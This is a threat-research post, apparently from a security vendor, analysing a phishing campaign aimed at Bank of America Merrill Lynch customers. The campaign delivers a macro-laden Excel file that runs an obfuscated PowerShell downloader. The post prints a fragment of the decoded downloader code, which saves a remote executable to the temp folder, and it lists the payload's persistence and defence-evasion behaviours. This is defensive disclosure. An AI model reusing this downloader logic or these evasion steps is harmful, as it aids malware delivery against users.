New Phishing campaign targets Bank of America Merrill Lynch customers


SonicWall has recently spotted a new Bank of America phishing campaign. The scam email claims to come from Bank of America Merrill Lynch, however the email includes a malicious Excel attachment. The Excel document has VBA macros, which when enabled, downloads and runs a malicious payload Win32.Trojan.

Infection Cycle:

Phishing email is the most effective attack vector, as exploit kits are no longer the preferred attack mode for hackers. In this phishing campaign, Bank of America Merrill Lynch customers are being targeted with a custom attack. All these fake emails come from the domain ‘’ not the real ‘’. The sender in these emails pretends to be a real employee from Bank of America as we see an online profile in the same name working in the southern California branch. However the Newport branch address and phone number doesn’t match.

Upon launching the excel attachment, a prompt appears with the message –  “If you have problems viewing/loading document content please select “Enable Editing” and then “Enable Content” button”. Once enabled, the macro downloads a malicious payload and the payload gets into action immediately.

The VBA code is locked by password.

After unlocking the VBA project by tweaking the binary, we see the form (shown below) with encoded value in its fields.

VBA code:

VBA code is highly obfuscated to avoid static detection through signatures. It has the logic to retrieve the shell code from the above form.

Shell Code:

The shell code that’s retrieved is pasted below. It has gzip compressed and base64 encoded string.


After applying decompression and base64 decoding on the above shell code, we get the below function that downloads the malicious payload either from hxxp:// or ‘hxxp://’

function <#release#> tisel([string] $stri1)
  (new-object <#exim#> ).downloadfile($stri1,$env:temp+'\tmp0281.exe');
return $tos1;

foreach ($rix in $men1)
if(tisel('http://'+$rix) -eq 1){

Hence upon enabling VB macro in the Excel document, shell command gets executed which then invokes Fileless PowerShell script to download and execute the malicious file.

The payload exhibits the following behaviors

  • Stops and deletes the Windows Defender service
  • Sets up Task Scheduler to run for every 10 minutes
  • Injects itself into the whitelisted process ‘svchost.exe’
  • Communicates with the C&C server periodically

Threat Graph:

Sonicwall Capture Labs Threat Research team provides protection against this with the following signatures:

  • GAV: Downloader.HWB (Trojan)
  • GAV: MalAgent.H_13330 (Trojan)





Payload Url:

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.